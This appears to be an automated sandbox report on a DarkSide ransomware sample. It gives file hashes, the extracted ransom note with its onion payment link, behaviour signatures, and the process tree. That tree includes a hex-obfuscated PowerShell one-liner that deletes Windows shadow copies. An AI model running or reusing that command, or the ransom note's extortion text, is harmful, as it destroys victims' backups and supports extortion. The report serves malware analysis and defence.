Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    12-05-2021 19:34

General

  • Target

    508dd6f7ed6c143cf5e1ed6a4051dd8ee7b5bf4b7f55e0704d21ba785f2d5add.exe

  • Size

    59KB

  • MD5

    69ec3d1368adbe75f3766fc88bc64afc

  • SHA1

    11936a92144ef1b53eef16566a57b9052d173291

  • SHA256

    508dd6f7ed6c143cf5e1ed6a4051dd8ee7b5bf4b7f55e0704d21ba785f2d5add

  • SHA512

    58f0f04cb05221e9a50eab89924c45bccc15045e9552e10f39ebbb651eddc5d4fafd95a1ba80f4a6ab8d23c4d3dfff7669e2499650b328420c766cae82e439e8

Malware Config

Extracted

Path

C:\\README.7b336f65.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3 When you open our website, put the following data in the input form: Key: 5l5BZPnhuDEYAVqJR4MgValoWwML2OjDOtYwubDXeXGefcJDd4otfGdb9pJPrHW7Rt0XqdwabTWl9I5xhiHBsW6mg5BoqR4M2LZ0TI1hN4ifY7RVgRakjxxhhyImncWtgNb8LWtJlhn6cwtDLlsIjq0wAn8s7YsdzgTPPreHXEyFiFH1ozVIpZXV1mO5QXMZu16DNkFcXVIfdw5gPeSYjd3VAa7VlIH8IXgwCuza7YprCeDIOmvRqYK1jBH4s4nn0VyEHnWRndP7jNNUmat6FMhNzeKnLYGbMDRwmZR6iFdFX0Y3lhEWenDamVRchRSE5YwiL9LqTfkrnrswflssAB0SOcodZXRxG5HNItcitj3Za1NzC5fmBpdKN4jV01hMBG98ZEN8HMKeOdVxKtbAZP86K9IfBy8QcNrWLQ2hAeup6DD6KsG8R0Jj8czKTu4MDlGaxQMtPSycA0B6IzpPVV0Tbn9yWIIFH6y4mir71zDWbcPH3p5Hnr80gTnOFHXGzkGfrdy1bjn5H99zniLFFjchV8EEPMtgG2PwKF7NVQ9dTdlMBHWQpGc !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\508dd6f7ed6c143cf5e1ed6a4051dd8ee7b5bf4b7f55e0704d21ba785f2d5add.exe
    "C:\Users\Admin\AppData\Local\Temp\508dd6f7ed6c143cf5e1ed6a4051dd8ee7b5bf4b7f55e0704d21ba785f2d5add.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2672
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1172

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    MD5

    ea6243fdb2bfcca2211884b0a21a0afc

    SHA1

    2eee5232ca6acc33c3e7de03900e890f4adf0f2f

    SHA256

    5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

    SHA512

    189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    MD5

    d49cd839be9415e6a233429576ad80eb

    SHA1

    9bbe7d8600f6f1abc1bcabd11554c90b9e6bc441

    SHA256

    513bed9e0e2256f9e29f3387d96cec43039e699f34cabb3d7b3556f7fbcd4bcc

    SHA512

    d74fc7c415a5499056701e5b21bbacb504ca73431b4c47f39a8b799a907e7213e724c65fa4e15e3bf900b5e6db9428150446e4fa92196e9a8de11640319555c8

  • memory/2672-114-0x0000000000000000-mapping.dmp

  • memory/2672-120-0x00000167F7BC0000-0x00000167F7BC1000-memory.dmp

    Filesize

    4KB

  • memory/2672-125-0x00000167F9E50000-0x00000167F9E51000-memory.dmp

    Filesize

    4KB

  • memory/2672-127-0x00000167F7CF3000-0x00000167F7CF5000-memory.dmp

    Filesize

    8KB

  • memory/2672-126-0x00000167F7CF0000-0x00000167F7CF2000-memory.dmp

    Filesize

    8KB

  • memory/2672-136-0x00000167F7CF6000-0x00000167F7CF8000-memory.dmp

    Filesize

    8KB